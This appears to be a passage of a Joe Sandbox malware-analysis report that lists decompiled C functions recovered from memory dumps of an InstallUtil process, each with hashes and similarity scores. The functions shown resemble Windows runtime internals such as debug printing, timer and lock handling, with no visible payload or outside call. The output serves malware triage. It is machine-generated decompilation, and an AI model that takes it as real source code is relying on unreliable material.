                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
                      • Instruction ID: aa67849905d9884f1e5480309581b5f4dca938a206fb1b7cdb22a3d4ddc96932
                      • Opcode Fuzzy Hash: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
                      • Instruction Fuzzy Hash: 8A912931E10259AFEB329B6CC848BADBBE5EB41718F050279FB11A72D2D7749C00C799
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E012CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                      				signed int _t65;
                      				signed short _t69;
                      				intOrPtr _t70;
                      				signed short _t85;
                      				void* _t86;
                      				signed short _t89;
                      				signed short _t91;
                      				intOrPtr _t92;
                      				intOrPtr _t97;
                      				intOrPtr* _t98;
                      				signed short _t99;
                      				signed short _t101;
                      				void* _t102;
                      				char* _t103;
                      				signed short _t104;
                      				intOrPtr* _t110;
                      				void* _t111;
                      				void* _t114;
                      				intOrPtr* _t115;
                      
                      				_t109 = __esi;
                      				_t108 = __edi;
                      				_t106 = __edx;
                      				_t95 = __ebx;
                      				_push(0x90);
                      				_push(0x139f7a8);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                      				if(__edx == 0xffffffff) {
                      					L6:
                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                      					__eflags = _t65 & 0x00000002;
                      					if((_t65 & 0x00000002) != 0) {
                      						L3:
                      						L4:
                      						return E0131D130(_t95, _t108, _t109);
                      					}
                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                      					_t108 = 0;
                      					_t109 = 0;
                      					_t95 = 0;
                      					__eflags = 0;
                      					while(1) {
                      						__eflags = _t95 - 0x200;
                      						if(_t95 >= 0x200) {
                      							break;
                      						}
                      						E0130D000(0x80);
                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                      						_t108 = _t115;
                      						_t95 = _t95 - 0xffffff80;
                      						_t17 = _t114 - 4;
                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                      						__eflags =  *_t17;
                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                      						_t102 = _t110 + 1;
                      						do {
                      							_t85 =  *_t110;
                      							_t110 = _t110 + 1;
                      							__eflags = _t85;
                      						} while (_t85 != 0);
                      						_t111 = _t110 - _t102;
                      						_t21 = _t95 - 1; // -129
                      						_t86 = _t21;
                      						__eflags = _t111 - _t86;
                      						if(_t111 > _t86) {
                      							_t111 = _t86;
                      						}
                      						E0130F3E0(_t108, _t106, _t111);
                      						_t115 = _t115 + 0xc;
                      						_t103 = _t111 + _t108;
                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                      						_t89 = _t95 - _t111;
                      						__eflags = _t89;
                      						_push(0);
                      						if(_t89 == 0) {
                      							L15:
                      							_t109 = 0xc000000d;
                      							goto L16;
                      						} else {
                      							__eflags = _t89 - 0x7fffffff;
                      							if(_t89 <= 0x7fffffff) {
                      								L16:
                      								 *(_t114 - 0x94) = _t109;
                      								__eflags = _t109;
                      								if(_t109 < 0) {
                      									__eflags = _t89;
                      									if(_t89 != 0) {
                      										 *_t103 = 0;
                      									}
                      									L26:
                      									 *(_t114 - 0xa0) = _t109;
                      									 *(_t114 - 4) = 0xfffffffe;
                      									__eflags = _t109;
                      									if(_t109 >= 0) {
                      										L31:
                      										_t98 = _t108;
                      										_t39 = _t98 + 1; // 0x1
                      										_t106 = _t39;
                      										do {
                      											_t69 =  *_t98;
                      											_t98 = _t98 + 1;
                      											__eflags = _t69;
                      										} while (_t69 != 0);
                      										_t99 = _t98 - _t106;
                      										__eflags = _t99;
                      										L34:
                      										_t70 =  *[fs:0x30];
                      										__eflags =  *((char*)(_t70 + 2));
                      										if( *((char*)(_t70 + 2)) != 0) {
                      											L40:
                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                      											 *(_t114 - 4) = 1;
                      											_push(_t114 - 0x74);
                      											E0131DEF0(_t99, _t106);
                      											 *(_t114 - 4) = 0xfffffffe;
                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                      											goto L3;
                      										}
                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                      											goto L40;
                      										}
                      										_push( *((intOrPtr*)(_t114 + 8)));
                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                      										_push(_t99 & 0x0000ffff);
                      										_push(_t108);
                      										_push(1);
                      										_t101 = E0130B280();
                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                      										if( *((char*)(_t114 + 0x14)) == 1) {
                      											__eflags = _t101 - 0x80000003;
                      											if(_t101 == 0x80000003) {
                      												E0130B7E0(1);
                      												_t101 = 0;
                      												__eflags = 0;
                      											}
                      										}
                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                      										goto L4;
                      									}
                      									__eflags = _t109 - 0x80000005;
                      									if(_t109 == 0x80000005) {
                      										continue;
                      									}
                      									break;
                      								}
                      								 *(_t114 - 0x90) = 0;
                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                      								_t91 = E0130E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                      								_t115 = _t115 + 0x10;
                      								_t104 = _t91;
                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                      								__eflags = _t104;
                      								if(_t104 < 0) {
                      									L21:
                      									_t109 = 0x80000005;
                      									 *(_t114 - 0x90) = 0x80000005;
                      									L22:
                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                      									L23:
                      									 *(_t114 - 0x94) = _t109;
                      									goto L26;
                      								}
                      								__eflags = _t104 - _t92;
                      								if(__eflags > 0) {
                      									goto L21;
                      								}
                      								if(__eflags == 0) {
                      									goto L22;
                      								}
                      								goto L23;
                      							}
                      							goto L15;
                      						}
                      					}
                      					__eflags = _t109;
                      					if(_t109 >= 0) {
                      						goto L31;
                      					}
                      					__eflags = _t109 - 0x80000005;
                      					if(_t109 != 0x80000005) {
                      						goto L31;
                      					}
                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                      					_t38 = _t95 - 1; // -129
                      					_t99 = _t38;
                      					goto L34;
                      				}
                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                      					__eflags = __edx - 0x65;
                      					if(__edx != 0x65) {
                      						goto L2;
                      					}
                      					goto L6;
                      				}
                      				L2:
                      				_push( *((intOrPtr*)(_t114 + 8)));
                      				_push(_t106);
                      				if(E0130A890() != 0) {
                      					goto L6;
                      				}
                      				goto L3;
                      			}























                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: _vswprintf_s
                      • String ID:
                      • API String ID: 677850445-0
                      • Opcode ID: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
                      • Instruction ID: d9aa9a896df3bc0f9f84475bc009d63403072c9a076f19b440f6e4cba6ec5147
                      • Opcode Fuzzy Hash: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
                      • Instruction Fuzzy Hash: 7B51F371E102698EDB36EF68C845BBEBFF0AF01718F1041ADD959AB282D7B14941CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E012EB944(signed int* __ecx, char __edx) {
                      				signed int _v8;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v28;
                      				signed int _v32;
                      				char _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				signed int* _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				char _v77;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t65;
                      				intOrPtr _t67;
                      				intOrPtr _t68;
                      				char* _t73;
                      				intOrPtr _t77;
                      				intOrPtr _t78;
                      				signed int _t82;
                      				intOrPtr _t83;
                      				void* _t87;
                      				char _t88;
                      				intOrPtr* _t89;
                      				intOrPtr _t91;
                      				void* _t97;
                      				intOrPtr _t100;
                      				void* _t102;
                      				void* _t107;
                      				signed int _t108;
                      				intOrPtr* _t112;
                      				void* _t113;
                      				intOrPtr* _t114;
                      				intOrPtr _t115;
                      				intOrPtr _t116;
                      				intOrPtr _t117;
                      				signed int _t118;
                      				void* _t130;
                      
                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                      				_v8 =  *0x13bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                      				_t112 = __ecx;
                      				_v77 = __edx;
                      				_v48 = __ecx;
                      				_v28 = 0;
                      				_t5 = _t112 + 0xc; // 0x575651ff
                      				_t105 =  *_t5;
                      				_v20 = 0;
                      				_v16 = 0;
                      				if(_t105 == 0) {
                      					_t50 = _t112 + 4; // 0x5de58b5b
                      					_t60 =  *__ecx |  *_t50;
                      					if(( *__ecx |  *_t50) != 0) {
                      						 *__ecx = 0;
                      						__ecx[1] = 0;
                      						if(E012E7D50() != 0) {
                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      						} else {
                      							_t65 = 0x7ffe0386;
                      						}
                      						if( *_t65 != 0) {
                      							E01398CD6(_t112);
                      						}
                      						_push(0);
                      						_t52 = _t112 + 0x10; // 0x778df98b
                      						_push( *_t52);
                      						_t60 = E01309E20();
                      					}
                      					L20:
                      					_pop(_t107);
                      					_pop(_t113);
                      					_pop(_t87);
                      					return E0130B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                      				}
                      				_t8 = _t112 + 8; // 0x8b000cc2
                      				_t67 =  *_t8;
                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                      				_t108 =  *(_t67 + 0x14);
                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                      				_t105 = 0x2710;
                      				asm("sbb eax, edi");
                      				_v44 = _t88;
                      				_v52 = _t108;
                      				_t60 = E0130CE00(_t97, _t68, 0x2710, 0);
                      				_v56 = _t60;
                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                      					L3:
                      					 *(_t112 + 0x44) = _t60;
                      					_t105 = _t60 * 0x2710 >> 0x20;
                      					 *_t112 = _t88;
                      					 *(_t112 + 4) = _t108;
                      					_v20 = _t60 * 0x2710;
                      					_v16 = _t60 * 0x2710 >> 0x20;
                      					if(_v77 != 0) {
                      						L16:
                      						_v36 = _t88;
                      						_v32 = _t108;
                      						if(E012E7D50() != 0) {
                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      						} else {
                      							_t73 = 0x7ffe0386;
                      						}
                      						if( *_t73 != 0) {
                      							_t105 = _v40;
                      							E01398F6A(_t112, _v40, _t88, _t108);
                      						}
                      						_push( &_v28);
                      						_push(0);
                      						_push( &_v36);
                      						_t48 = _t112 + 0x10; // 0x778df98b
                      						_push( *_t48);
                      						_t60 = E0130AF60();
                      						goto L20;
                      					} else {
                      						_t89 = 0x7ffe03b0;
                      						do {
                      							_t114 = 0x7ffe0010;
                      							do {
                      								_t77 =  *0x13b8628; // 0x0
                      								_v68 = _t77;
                      								_t78 =  *0x13b862c; // 0x0
                      								_v64 = _t78;
                      								_v72 =  *_t89;
                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                      								while(1) {
                      									_t105 =  *0x7ffe000c;
                      									_t100 =  *0x7ffe0008;
                      									if(_t105 ==  *_t114) {
                      										goto L8;
                      									}
                      									asm("pause");
                      								}
                      								L8:
                      								_t89 = 0x7ffe03b0;
                      								_t115 =  *0x7ffe03b0;
                      								_t82 =  *0x7FFE03B4;
                      								_v60 = _t115;
                      								_t114 = 0x7ffe0010;
                      								_v56 = _t82;
                      							} while (_v72 != _t115 || _v76 != _t82);
                      							_t83 =  *0x13b8628; // 0x0
                      							_t116 =  *0x13b862c; // 0x0
                      							_v76 = _t116;
                      							_t117 = _v68;
                      						} while (_t117 != _t83 || _v64 != _v76);
                      						asm("sbb edx, [esp+0x24]");
                      						_t102 = _t100 - _v60 - _t117;
                      						_t112 = _v48;
                      						_t91 = _v44;
                      						asm("sbb edx, eax");
                      						_t130 = _t105 - _v52;
                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                      							_t88 = _t102 - _t91;
                      							asm("sbb edx, edi");
                      							_t108 = _t105;
                      						} else {
                      							_t88 = 0;
                      							_t108 = 0;
                      						}
                      						goto L16;
                      					}
                      				} else {
                      					if( *(_t112 + 0x44) == _t60) {
                      						goto L20;
                      					}
                      					goto L3;
                      				}
                      			}

















































                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012EB9A5
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 885266447-0
                      • Opcode ID: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
                      • Instruction ID: f68a8321058d559eb4c4005466a505af6c95468f5e3cf4c833db6b574fd7193c
                      • Opcode Fuzzy Hash: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
                      • Instruction Fuzzy Hash: 31516A71A28341CFCB21CF2DC0C492ABBE9FB88614F54496EEA8587355E770E844CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 70%
                      			E01373D40(intOrPtr __ecx, char* __edx) {
                      				signed int _v8;
                      				char* _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				char _v29;
                      				intOrPtr* _v32;
                      				char _v36;
                      				char _v37;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				char* _t34;
                      				intOrPtr* _t37;
                      				intOrPtr* _t42;
                      				intOrPtr* _t47;
                      				intOrPtr* _t48;
                      				intOrPtr* _t49;
                      				char _t51;
                      				void* _t52;
                      				intOrPtr* _t53;
                      				char* _t55;
                      				char _t59;
                      				char* _t61;
                      				intOrPtr* _t64;
                      				void* _t65;
                      				char* _t67;
                      				void* _t68;
                      				signed int _t70;
                      
                      				_t62 = __edx;
                      				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                      				_v8 =  *0x13bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                      				_t34 =  &_v28;
                      				_v20 = __ecx;
                      				_t67 = __edx;
                      				_v24 = _t34;
                      				_t51 = 0;
                      				_v12 = __edx;
                      				_v29 = 0;
                      				_v28 = _t34;
                      				E012E2280(_t34, 0x13b8a6c);
                      				_t64 =  *0x13b5768; // 0x77575768
                      				if(_t64 != 0x13b5768) {
                      					while(1) {
                      						_t8 = _t64 + 8; // 0x77575770
                      						_t42 = _t8;
                      						_t53 = _t64;
                      						 *_t42 =  *_t42 + 1;
                      						_v16 = _t42;
                      						E012DFFB0(_t53, _t64, 0x13b8a6c);
                      						 *0x13bb1e0(_v24, _t67);
                      						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                      							_v37 = 1;
                      						}
                      						E012E2280(_t45, 0x13b8a6c);
                      						_t47 = _v28;
                      						_t64 =  *_t64;
                      						 *_t47 =  *_t47 - 1;
                      						if( *_t47 != 0) {
                      							goto L8;
                      						}
                      						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                      							L10:
                      							_push(3);
                      							asm("int 0x29");
                      						} else {
                      							_t48 =  *((intOrPtr*)(_t53 + 4));
                      							if( *_t48 != _t53) {
                      								goto L10;
                      							} else {
                      								 *_t48 = _t64;
                      								_t61 =  &_v36;
                      								 *((intOrPtr*)(_t64 + 4)) = _t48;
                      								_t49 = _v32;
                      								if( *_t49 != _t61) {
                      									goto L10;
                      								} else {
                      									 *_t53 = _t61;
                      									 *((intOrPtr*)(_t53 + 4)) = _t49;
                      									 *_t49 = _t53;
                      									_v32 = _t53;
                      									goto L8;
                      								}
                      							}
                      						}
                      						L11:
                      						_t51 = _v29;
                      						goto L12;
                      						L8:
                      						if(_t64 != 0x13b5768) {
                      							_t67 = _v20;
                      							continue;
                      						}
                      						goto L11;
                      					}
                      				}
                      				L12:
                      				E012DFFB0(_t51, _t64, 0x13b8a6c);
                      				while(1) {
                      					_t37 = _v28;
                      					_t55 =  &_v28;
                      					if(_t37 == _t55) {
                      						break;
                      					}
                      					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                      						goto L10;
                      					} else {
                      						_t59 =  *_t37;
                      						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                      							goto L10;
                      						} else {
                      							_t62 =  &_v28;
                      							_v28 = _t59;
                      							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                      							continue;
                      						}
                      					}
                      					L18:
                      				}
                      				_pop(_t65);
                      				_pop(_t68);
                      				_pop(_t52);
                      				return E0130B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                      				goto L18;
                      			}


































                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: 5039844f0f7f8a2af340b89869606a228c2b68f4befe4ccf49c0280b18f5274f
                      • Instruction ID: b4eaa60220f3e76e17e12f271ee0baf099910ed11732f6726642916dad92b9bb
                      • Opcode Fuzzy Hash: 5039844f0f7f8a2af340b89869606a228c2b68f4befe4ccf49c0280b18f5274f
                      • Instruction Fuzzy Hash: 5D318B72609306CFC724DF18D58086ABBE5FF85708F4449AEE5899BA41E734DD04CBD2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 58%
                      			E01304A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				signed int* _v12;
                      				char _v13;
                      				signed int _v16;
                      				char _v21;
                      				signed int* _v24;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t29;
                      				signed int* _t32;
                      				signed int* _t41;
                      				signed int _t42;
                      				void* _t43;
                      				intOrPtr* _t51;
                      				void* _t52;
                      				signed int _t53;
                      				signed int _t58;
                      				void* _t59;
                      				signed int _t60;
                      				signed int _t62;
                      
                      				_t49 = __edx;
                      				_t62 = (_t60 & 0xfffffff8) - 0xc;
                      				_t26 =  *0x13bd360 ^ _t62;
                      				_v8 =  *0x13bd360 ^ _t62;
                      				_t41 = __ecx;
                      				_t51 = __edx;
                      				_v12 = __ecx;
                      				if(_a4 == 0) {
                      					if(_a8 != 0) {
                      						goto L1;
                      					}
                      					_v13 = 1;
                      					E012E2280(_t26, 0x13b8608);
                      					_t58 =  *_t41;
                      					if(_t58 == 0) {
                      						L11:
                      						E012DFFB0(_t41, _t51, 0x13b8608);
                      						L2:
                      						 *0x13bb1e0(_a4, _a8);
                      						_t42 =  *_t51();
                      						if(_t42 == 0) {
                      							_t29 = 0;
                      							L5:
                      							_pop(_t52);
                      							_pop(_t59);
                      							_pop(_t43);
                      							return E0130B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                      						}
                      						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                      						if(_v21 != 0) {
                      							_t53 = 0;
                      							E012E2280(_t28, 0x13b8608);
                      							_t32 = _v24;
                      							if( *_t32 == _t58) {
                      								 *_t32 = _t42;
                      								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                      								if(_t58 != 0) {
                      									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                      									asm("sbb edi, edi");
                      									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                      								}
                      							}
                      							E012DFFB0(_t42, _t53, 0x13b8608);
                      							if(_t53 != 0) {
                      								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                      							}
                      						}
                      						_t29 = _t42;
                      						goto L5;
                      					}
                      					if( *((char*)(_t58 + 0x40)) != 0) {
                      						L10:
                      						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                      						E012DFFB0(_t41, _t51, 0x13b8608);
                      						_t29 = _t58;
                      						goto L5;
                      					}
                      					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                      					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                      						goto L11;
                      					}
                      					goto L10;
                      				}
                      				L1:
                      				_v13 = 0;
                      				_t58 = 0;
                      				goto L2;
                      			}

























                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: 438b4fceb72a71a5f68d5d0428db0008e81618e1509b927ed9556c388ef0c1fc
                      • Instruction ID: c1c5f9db29e1c757fd3429b4838782595bc9ad384f15b89afc892f090b429265
                      • Opcode Fuzzy Hash: 438b4fceb72a71a5f68d5d0428db0008e81618e1509b927ed9556c388ef0c1fc
                      • Instruction Fuzzy Hash: EB314432205305DFE7229F18C984B2ABBE8FFC0718F44046DEB564BA81D770DA40CB8A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 53%
                      			E012E0050(void* __ecx) {
                      				signed int _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr* _t30;
                      				intOrPtr* _t31;
                      				signed int _t34;
                      				void* _t40;
                      				void* _t41;
                      				signed int _t44;
                      				intOrPtr _t47;
                      				signed int _t58;
                      				void* _t59;
                      				void* _t61;
                      				void* _t62;
                      				signed int _t64;
                      
                      				_push(__ecx);
                      				_v8 =  *0x13bd360 ^ _t64;
                      				_t61 = __ecx;
                      				_t2 = _t61 + 0x20; // 0x20
                      				E012F9ED0(_t2, 1, 0);
                      				_t52 =  *(_t61 + 0x8c);
                      				_t4 = _t61 + 0x8c; // 0x8c
                      				_t40 = _t4;
                      				do {
                      					_t44 = _t52;
                      					_t58 = _t52 & 0x00000001;
                      					_t24 = _t44;
                      					asm("lock cmpxchg [ebx], edx");
                      					_t52 = _t44;
                      				} while (_t52 != _t44);
                      				if(_t58 == 0) {
                      					L7:
                      					_pop(_t59);
                      					_pop(_t62);
                      					_pop(_t41);
                      					return E0130B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                      				}
                      				asm("lock xadd [esi], eax");
                      				_t47 =  *[fs:0x18];
                      				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                      				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                      				if(_t30 != 0) {
                      					if( *_t30 == 0) {
                      						goto L4;
                      					}
                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      					L5:
                      					if( *_t31 != 0) {
                      						_t18 = _t61 + 0x78; // 0x78
                      						E01398A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                      					}
                      					_t52 =  *(_t61 + 0x5c);
                      					_t11 = _t61 + 0x78; // 0x78
                      					_t34 = E012F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                      					_t24 = _t34 | 0xffffffff;
                      					asm("lock xadd [esi], eax");
                      					if((_t34 | 0xffffffff) == 0) {
                      						 *0x13bb1e0(_t61);
                      						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                      					}
                      					goto L7;
                      				}
                      				L4:
                      				_t31 = 0x7ffe0386;
                      				goto L5;
                      			}





















                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID:
                      • API String ID: 3446177414-0
                      • Opcode ID: 6b66176f7ea9c287ca50f6be61f721b333299570755f0535f783089c190d9ced
                      • Instruction ID: e923d23db8c2ab0a7c40bb1d73054382e461b7ff609b11c882dc720e8a6e1650
                      • Opcode Fuzzy Hash: 6b66176f7ea9c287ca50f6be61f721b333299570755f0535f783089c190d9ced
                      • Instruction Fuzzy Hash: 7B318F31311B05CFD726CF2CC844B5AB7E5FF89714F14456DE69687A90EBB5A802CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E012F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
                      				signed int _v8;
                      				signed int _v16;
                      				unsigned int _v24;
                      				void* _v28;
                      				signed int _v32;
                      				unsigned int _v36;
                      				void* _v37;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				intOrPtr _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _t240;
                      				signed int _t244;
                      				signed int _t245;
                      				signed int _t254;
                      				signed int _t256;
                      				intOrPtr _t258;
                      				signed int _t261;
                      				signed int _t268;
                      				signed int _t271;
                      				signed int _t279;
                      				intOrPtr _t285;
                      				signed int _t287;
                      				signed int _t289;
                      				void* _t290;
                      				signed int _t291;
                      				signed int _t292;
                      				unsigned int _t295;
                      				signed int _t299;
                      				signed int* _t300;
                      				signed int _t301;
                      				signed int _t305;
                      				intOrPtr _t317;
                      				signed int _t326;
                      				signed int _t328;
                      				signed int _t329;
                      				signed int _t333;
                      				signed int _t334;
                      				signed int _t336;
